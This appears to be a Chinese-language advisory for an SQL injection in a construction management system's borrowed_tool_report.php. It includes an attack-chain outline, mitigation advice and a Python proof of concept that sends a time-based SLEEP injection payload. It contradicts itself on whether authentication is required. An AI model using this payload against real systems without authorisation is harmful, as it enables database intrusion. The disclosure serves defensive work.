CVE-2026-5823: itsourcecode CMS SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5823

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Construction Management System

漏洞概述

itsourcecode Construction Management System 1.0版本存在SQL注入安全漏洞。受影响的组件包括/borrowed_tool_report.php文件中的Home参数。由于缺乏适当的输入过滤，未经身份验证的远程攻击者可利用此漏洞执行恶意SQL语句，从而窃取、修改或删除数据库中的敏感数据，对系统机密性、完整性及可用性造成威胁。

技术细节

该漏洞属于典型的SQL注入漏洞，主要成因是应用程序未对用户输入进行充分的过滤和验证。在itsourcecode Construction Management System 1.0中，`/borrowed_tool_report.php`文件负责处理特定报告请求。开发人员在编写代码时，直接将用户通过HTTP请求提交的`Home`参数拼接到后端SQL查询语句中，未使用预编译语句或转义机制。攻击者可利用这一缺陷，构造包含特定SQL语法的恶意Payload（例如利用单引号闭合原有查询结构，并通过UNION SELECT语句联合查询敏感数据）。当服务器端接收到该请求并执行SQL命令时，攻击者即可获取数据库中的用户凭证、配置信息等敏感内容。此外，根据CVSS评分，该漏洞允许低权限用户远程利用，且无需用户交互，具有较高的实际利用风险。

攻击链分析

STEP 1

侦察

攻击者识别目标系统为itsourcecode Construction Management System 1.0，并确认存在/borrowed_tool_report.php接口。

STEP 2

武器化

攻击者构造包含SQL命令的恶意Payload，针对Home参数进行注入测试，例如使用UNION SELECT或布尔盲注语句。

STEP 3

投递

攻击者通过HTTP GET或POST请求，将包含恶意Payload的Home参数发送至服务器的/borrowed_tool_report.php端点。

STEP 4

利用

服务器端未对Home参数进行过滤，直接将其拼接到SQL查询中执行数据库操作。

STEP 5

达成

攻击者成功获取数据库敏感信息（如用户名、密码哈希），或篡改、删除数据，影响系统机密性、完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    """
    PoC for CVE-2026-5823 SQL Injection in borrowed_tool_report.php
    """
    target_url = f"{url}/borrowed_tool_report.php"
    # Simple payload to test for time-based or error-based injection
    payload = "1' AND SLEEP(5)-- -"
    
    params = {
        "Home": payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        # Analyze response time or content to confirm vulnerability
        print(f"Status Code: {response.status_code}")
        print(f"Response Time: {response.elapsed.total_seconds()}s")
        if response.elapsed.total_seconds() >= 5:
            print("[+] Potential SQL Injection vulnerability detected!")
        else:
            print("[-] Vulnerability not confirmed via timing.")
    except requests.RequestException as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    check_sqli(target)

影响范围

itsourcecode Construction Management System 1.0

防御指南

临时缓解措施

建议立即审查/borrowed_tool_report.php文件代码，对Home参数实施严格的输入类型检查和特殊字符转义。在未修复前，可暂时禁用该功能或通过WAF拦截包含SQL关键字的请求。同时，应加强数据库访问控制，避免使用高权限数据库账户连接Web应用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5823
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5823
3 Details https://www.cvedetails.com/cve/CVE-2026-5823/
4 VulDB https://vuldb.com/cve/CVE-2026-5823
5 Link https://github.com/ltranquility/cve_submit/issues/14
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/submit/788299
8 Link https://vuldb.com/vuln/356270
9 Link https://vuldb.com/vuln/356270/cti